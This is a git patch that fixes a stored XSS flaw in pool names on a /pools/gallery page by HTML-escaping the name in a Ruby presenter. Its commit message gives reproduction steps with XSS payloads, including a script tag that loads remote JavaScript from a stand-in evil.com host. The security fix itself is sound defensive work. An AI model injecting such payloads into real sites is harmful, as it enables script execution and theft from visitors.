From 22c624c356c02f738702150f9ae837364085727b Mon Sep 17 00:00:00 2001
From: evazion <noizave@gmail.com>
Date: Tue, 30 Sep 2014 03:04:48 -0500
Subject: [PATCH] Fix XSS in pool names in /pools/gallery page.

1) Set a pool name to '<script>alert("xss")</script>'.
2) Wait for people to view it in /pools/gallery.

At first glance the fact that the pool name is truncated to 80 chars
appears to limit how much can be done in the exploit. This poses no
problem though, since someone could inject '<script src="http://www.evil.com/evil.js"></script>' instead.
---
 app/presenters/post_presenter.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/app/presenters/post_presenter.rb b/app/presenters/post_presenter.rb
index 23e93a8e7..e64c60803 100644
--- a/app/presenters/post_presenter.rb
+++ b/app/presenters/post_presenter.rb
@@ -27,7 +27,7 @@ class PostPresenter < Presenter
     if options[:pool]
       html << %{<p class="desc">}
       html << %{<a href="/pools/#{options[:pool].id}">}
-      html << options[:pool].pretty_name.truncate(80)
+      html << h(options[:pool].pretty_name.truncate(80))
       html << %{</a>}
       html << %{</p>}
     end